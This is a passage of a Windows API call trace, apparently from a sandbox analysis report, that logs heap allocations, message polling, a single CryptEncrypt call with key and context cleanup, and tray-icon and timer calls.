(HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.430] CharLowerBuffW (in: lpsz="byte[48145]", cchLength=0xb | out: lpsz="byte[48145]") returned 0xb [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0164.430] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0164.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.433] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0164.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0164.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.434] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa085d8*, pdwDataLen=0x87e820*=0xbc0c, dwBufLen=0xbc10 | out: pbData=0xa085d8*, pdwDataLen=0x87e820*=0xbc10) returned 1 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0164.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0164.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0164.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.434] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0164.437] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.438] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0164.438] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.438] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.438] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.438] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.438] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.438] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0164.438] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.438] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.439] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0164.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0164.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.443] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.443] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.444] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0164.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.448] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.448] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.448] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0164.449] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0164.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.449] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0164.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.449] CryptDestroyKey (hKey=0x90aed8) returned 1 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.453] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0164.453] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.453] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.453] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.453] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0164.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.454] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0164.454] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.454] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.454] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.454] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0164.454] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0164.454] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.454] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0164.454] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0164.454] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.455] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0164.455] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.455] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.455] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.455] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.455] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0164.455] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.455] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.455] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.456] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.456] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0164.456] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.456] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.456] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0164.463] FreeLibrary (hLibModule=0x74f20000) returned 1 [0164.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 1 [0164.464] TranslateMessage (lpMsg=0x87f114) returned 0 [0164.464] DispatchMessageW (lpMsg=0x87f114) returned 0x0 [0164.464] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e7b0) returned 1 [0164.464] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0164.464] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0164.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0164.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.464] 